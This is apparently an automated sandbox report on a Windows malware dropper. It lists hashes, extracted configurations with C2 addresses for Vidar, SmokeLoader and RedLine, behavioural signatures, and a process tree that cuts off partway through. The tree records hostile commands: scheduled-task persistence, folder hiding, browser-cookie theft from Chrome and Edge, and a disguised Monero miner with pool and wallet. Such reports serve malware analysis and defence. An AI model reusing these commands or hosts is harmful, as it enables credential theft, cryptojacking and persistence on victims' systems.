Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1821s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 21:22

General

  • Target

    8 (14).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

C2

45.140.147.111:22333

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 39 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 30 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 7 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 27 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2692
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2576
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2376
          • C:\Users\Admin\AppData\Local\Temp\8 (14).exe
            "C:\Users\Admin\AppData\Local\Temp\8 (14).exe"
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3856
            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2388
              • C:\Users\Admin\AppData\Local\Temp\7zS45914854\setup_install.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS45914854\setup_install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1916
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3344
                  • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_1.exe
                    sonia_1.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3356
                    • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_1.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_1.exe" -a
                      6⤵
                        PID:3544
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3332
                    • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_2.exe
                      sonia_2.exe
                      5⤵
                      • Executes dropped EXE
                      PID:2104
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:8
                    • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_3.exe
                      sonia_3.exe
                      5⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:2412
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 928
                        6⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4568
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3948
                    • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_4.exe
                      sonia_4.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1900
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3404
                    • C:\Users\Admin\AppData\Local\Temp\7zS45914854\sonia_5.exe
                      sonia_5.exe
                      5⤵
                      • Executes dropped EXE
                      PID:3856
                      • C:\Users\Admin\Documents\YTVbtts5_8m0ggtC21OxaIbS.exe
                        "C:\Users\Admin\Documents\YTVbtts5_8m0ggtC21OxaIbS.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4900
                        • C:\Users\Admin\Documents\YTVbtts5_8m0ggtC21OxaIbS.exe
                          C:\Users\Admin\Documents\YTVbtts5_8m0ggtC21OxaIbS.exe
                          7⤵
                          • Executes dropped EXE
                          PID:4144
                      • C:\Users\Admin\Documents\bxmiDSuP6htByAUaHckDDm_r.exe
                        "C:\Users\Admin\Documents\bxmiDSuP6htByAUaHckDDm_r.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4888
                        • C:\Users\Admin\Documents\bxmiDSuP6htByAUaHckDDm_r.exe
                          C:\Users\Admin\Documents\bxmiDSuP6htByAUaHckDDm_r.exe
                          7⤵
                          • Executes dropped EXE
                          PID:3844
                      • C:\Users\Admin\Documents\Msklt8B_bG0mH7344r2GiJPY.exe
                        "C:\Users\Admin\Documents\Msklt8B_bG0mH7344r2GiJPY.exe"
                        6⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        PID:4872
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                          7⤵
                          • Creates scheduled task(s)
                          PID:4644
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                          7⤵
                            PID:676
                            • C:\Windows\system32\attrib.exe
                              attrib +H +S "C:\ProgramData\\Provisioning"
                              8⤵
                              • Views/modifies file attributes
                              PID:1224
                            • C:\Windows\system32\attrib.exe
                              attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                              8⤵
                              • Views/modifies file attributes
                              PID:5404
                          • C:\ProgramData\Provisioning\settings.exe
                            "C:\ProgramData\Provisioning\settings.exe"
                            7⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Drops desktop.ini file(s)
                            PID:5748
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                              8⤵
                              • Creates scheduled task(s)
                              PID:4004
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                              8⤵
                                PID:4452
                                • C:\Windows\system32\attrib.exe
                                  attrib +H +S "C:\ProgramData\\Provisioning"
                                  9⤵
                                  • Views/modifies file attributes
                                  PID:5128
                                • C:\Windows\system32\attrib.exe
                                  attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                  9⤵
                                  • Views/modifies file attributes
                                  PID:6084
                          • C:\Users\Admin\Documents\b_koAzhaBmIEZjr5XcH6fpPq.exe
                            "C:\Users\Admin\Documents\b_koAzhaBmIEZjr5XcH6fpPq.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:4864
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\b_koAzhaBmIEZjr5XcH6fpPq.exe"
                              7⤵
                                PID:5760
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:4408
                            • C:\Users\Admin\Documents\5bc1Yn6ahSenIkozhsPL_lnr.exe
                              "C:\Users\Admin\Documents\5bc1Yn6ahSenIkozhsPL_lnr.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4848
                            • C:\Users\Admin\Documents\7KrnyhoL0sf5tE8M8d_s2TNX.exe
                              "C:\Users\Admin\Documents\7KrnyhoL0sf5tE8M8d_s2TNX.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4912
                              • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\7KrnyhoL0sf5tE8M8d_s2TNX.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3686645723-710336880-414668232-1000"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetWindowsHookEx
                                PID:4644
                                • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                  "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:6120
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                    9⤵
                                      PID:4924
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im smartmap.exe /f
                                        10⤵
                                        • Kills process with taskkill
                                        PID:204
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        10⤵
                                        • Delays execution with timeout.exe
                                        PID:5364
                              • C:\Users\Admin\Documents\doqKagErE0K8U0JE7ciI_CD6.exe
                                "C:\Users\Admin\Documents\doqKagErE0K8U0JE7ciI_CD6.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:1800
                                • C:\Users\Admin\Documents\doqKagErE0K8U0JE7ciI_CD6.exe
                                  "C:\Users\Admin\Documents\doqKagErE0K8U0JE7ciI_CD6.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:5716
                              • C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe
                                "C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:5068
                                • C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe
                                  C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2820
                                • C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe
                                  C:\Users\Admin\Documents\3IstFZnwRQfG48uTC5BBI1Jp.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4328
                              • C:\Users\Admin\Documents\H7C00OEFxLGP7L4lNVyjD2B5.exe
                                "C:\Users\Admin\Documents\H7C00OEFxLGP7L4lNVyjD2B5.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4980
                              • C:\Users\Admin\Documents\1dFDOG4rXD5qWnEosdyBzmYv.exe
                                "C:\Users\Admin\Documents\1dFDOG4rXD5qWnEosdyBzmYv.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4416
                                • C:\Users\Admin\Documents\1dFDOG4rXD5qWnEosdyBzmYv.exe
                                  C:\Users\Admin\Documents\1dFDOG4rXD5qWnEosdyBzmYv.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4548
                              • C:\Users\Admin\Documents\iyUCIRLhd8f8I5ED6MPGz_20.exe
                                "C:\Users\Admin\Documents\iyUCIRLhd8f8I5ED6MPGz_20.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2132
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5029056396.exe"
                                  7⤵
                                    PID:4736
                                    • C:\Users\Admin\AppData\Local\Temp\5029056396.exe
                                      "C:\Users\Admin\AppData\Local\Temp\5029056396.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks processor information in registry
                                      PID:4104
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5029056396.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5029056396.exe" & del C:\ProgramData\*.dll & exit
                                        9⤵
                                          PID:5512
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im 5029056396.exe /f
                                            10⤵
                                            • Kills process with taskkill
                                            PID:4664
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 6
                                            10⤵
                                            • Delays execution with timeout.exe
                                            PID:4588
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4977071289.exe"
                                      7⤵
                                        PID:5236
                                        • C:\Users\Admin\AppData\Local\Temp\4977071289.exe
                                          "C:\Users\Admin\AppData\Local\Temp\4977071289.exe"
                                          8⤵
                                            PID:4508
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "iyUCIRLhd8f8I5ED6MPGz_20.exe" /f & erase "C:\Users\Admin\Documents\iyUCIRLhd8f8I5ED6MPGz_20.exe" & exit
                                          7⤵
                                          • Blocklisted process makes network request
                                          • Checks computer location settings
                                          PID:3856
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4868
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "iyUCIRLhd8f8I5ED6MPGz_20.exe" /f
                                            8⤵
                                            • Kills process with taskkill
                                            PID:6104
                                      • C:\Users\Admin\Documents\Nx8NY4BKgi1Iufy_s5R7mMnw.exe
                                        "C:\Users\Admin\Documents\Nx8NY4BKgi1Iufy_s5R7mMnw.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4304
                                      • C:\Users\Admin\Documents\7sxmctPAFa_mrEXMd2N1EyUA.exe
                                        "C:\Users\Admin\Documents\7sxmctPAFa_mrEXMd2N1EyUA.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:3520
                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4156
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4612
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                            8⤵
                                              PID:5220
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:2632
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                8⤵
                                                • Executes dropped EXE
                                                PID:4824
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:3988
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  8⤵
                                                    PID:4316
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:4152
                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                      8⤵
                                                        PID:5848
                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • Drops file in Program Files directory
                                                      PID:5104
                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5008
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                          PID:4868
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:3684
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                            PID:5284
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                              PID:5832
                                                        • C:\Users\Admin\Documents\UvSULViB1lCbMmTdjtgc2OJT.exe
                                                          "C:\Users\Admin\Documents\UvSULViB1lCbMmTdjtgc2OJT.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:1840
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                            7⤵
                                                              PID:5388
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                8⤵
                                                                • Creates scheduled task(s)
                                                                PID:5812
                                                            • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:5556
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                8⤵
                                                                  PID:5256
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                    9⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:2408
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5908
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                  8⤵
                                                                    PID:3988
                                                              • C:\Users\Admin\Documents\GbQCRZoOxLjWWuK73uWHhHpJ.exe
                                                                "C:\Users\Admin\Documents\GbQCRZoOxLjWWuK73uWHhHpJ.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2824
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                  7⤵
                                                                    PID:3472
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im chrome.exe
                                                                      8⤵
                                                                      • Kills process with taskkill
                                                                      PID:4632
                                                                • C:\Users\Admin\Documents\ZbBeQ9Rceo2GI38EBZYPOBC1.exe
                                                                  "C:\Users\Admin\Documents\ZbBeQ9Rceo2GI38EBZYPOBC1.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4216
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:5196
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:1352
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4532
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
